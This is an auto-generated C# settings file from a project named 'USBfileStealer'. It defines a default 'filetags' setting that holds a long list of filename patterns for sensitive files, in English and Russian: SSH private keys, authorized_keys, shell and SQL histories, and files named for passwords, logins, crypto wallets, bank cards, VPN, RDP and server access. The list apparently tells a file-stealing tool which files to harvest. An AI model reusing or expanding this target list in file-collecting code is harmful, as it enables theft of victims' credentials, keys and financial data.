//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace USBfileStealer.Properties {
    
    
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")]
    internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
        
        private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
        
        public static Settings Default {
            get {
                return defaultInstance;
            }
        }
        
        [global::System.Configuration.UserScopedSettingAttribute()]
        [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
        [global::System.Configuration.DefaultSettingValueAttribute("*.ppk\r\n*.pref\r\n*.remmina\r\n*.sh\r\n*.txt\r\n*.хml*\r\n*access*.txt\r\n*account*\r\n*accs*.tx" +
            "t\r\n*admin*.txt\r\n*amazon*.txt\r\n*authorized_keys*\r\n*balance*.txt\r\n*bash_history*\r\n" +
            "*billing*.txt\r\n*btc*.txt*brute*\r\n*c6ep*.txt\r\n*cepвep*\r\n*codes*\r\n*connect*\r\n*cont" +
            "acts*.txt\r\n*database*\r\n*dedic*.txt\r\n*dedik*.txt\r\n*domain*.txt\r\n*ftp*.txt\r\n*hack*" +
            ".txt\r\n*host*.txt\r\n*icq*.txt\r\n*id_*sa*\r\n*id_dsa*\r\n*id_rsa*\r\n*known_hosts*\r\n*ksh_h" +
            "istory*\r\n*login*\r\n*mail*.txt\r\n*merchant*.txt\r\n*money*\r\n*myadmin*.txt\r\n*mysql_his" +
            "tory*\r\n*nano_history*\r\n*parol*\r\n*pass*\r\n*pentest*\r\n*pgsql_history*\r\n*pma*.txt\r\n*" +
            "pref*\r\n*qwerty*\r\n*rdp*.txt\r\n*remmina*\r\n*root*\r\n*serv*.txt\r\n*sh_history*\r\n*srv*.t" +
            "xt\r\n*todo*.txt\r\n*userid*\r\n*users*\r\n*vds*.txt\r\n*vpn*.txt\r\n*vps*.txt\r\n*vuln*.txt\r\n" +
            "*wallet*\r\n*webmon*\r\n*zsh_history*\r\n*акк*.txt\r\n*аккаунт*\r\n*баги*\r\n*баланс*\r\n*бала" +
            "нс*.txt\r\n*банк*.txt\r\n*бтц*\r\n*важн*.txt\r\n*вдс*.txt\r\n*вебман*\r\n*вебман*.txt\r\n*взло" +
            "м*\r\n*впн*.txt\r\n*впс*.txt\r\n*данны*\r\n*деньг*\r\n*доступ*\r\n*задачи*\r\n*задачи*.txt\r\n*и" +
            "нфо*.txt\r\n*картон*.txt\r\n*карты*.txt\r\n*ключ*.txt\r\n*коин*\r\n*кош*.txt\r\n*кредит*\r\n*л" +
            "огин*.txt\r\n*парол*\r\n*почта*\r\n*приват*\r\n*рут*.txt\r\n*секрет*\r\n*секрет*.txt\r\n*серве" +
            "р*\r\n*серт*.txt\r\n*смс*.txt\r\n*сокс*.txt\r\n*счет*.txt\r\n*тест*.txt\r\n*туду*.txt\r\n*уязв" +
            "им*\r\n*фтп*.txt\r\n*хак*.txt\r\n*шел*.txt\r\n*шоп*.txt\r\n*эккаунт*\r\n*эксплоит*\r\naccess.t" +
            "xt\r\nadm.txt\r\nall.txt\r\nbill.txt\r\ncard.txt\r\ncards.txt\r\ncc.txt\r\ncentos.txt\r\ndata.tx" +
            "t\r\nded.txt\r\nftps.txt\r\nfull.txt\r\nhdd.txt\r\nhost.txt\r\nid.txt\r\ninfo.txt\r\nkey.txt\r\nli" +
            "nux.txt\r\nmail.txt\r\nmails.txt\r\npern*.txt\r\nskype*.txt\r\nsql*.txt\r\nssh*.txt\r\nsys.txt" +
            "\r\ntconn.conf\r\ntoor.txt\r\nubuntu.txt\r\nusb.txt\r\nuser.txt\r\nvirtual.txt\r\nрег*.txt\r\nсб" +
            "ер*.txt\r\nссх*.txt\r\n*парол*\r\n*pass*\r\n*pwd*\r\n*login*\r\n*логин*\r\n*vk.com*\r\nвконтакте" +
            "\r\n*почты*\r\n*.xls*\r\n*.doc*\r\n*.rtf\r\n*.JPG\r\n*.jpeg\r\n*.pgf\r\n*.bmp\r\n*.cr2\r\n*config*\r\n" +
            "*пинкод*\r\n*банк*")]
        public string filetags {
            get {
                return ((string)(this["filetags"]));
            }
            set {
                this["filetags"] = value;
            }
        }
    }
}
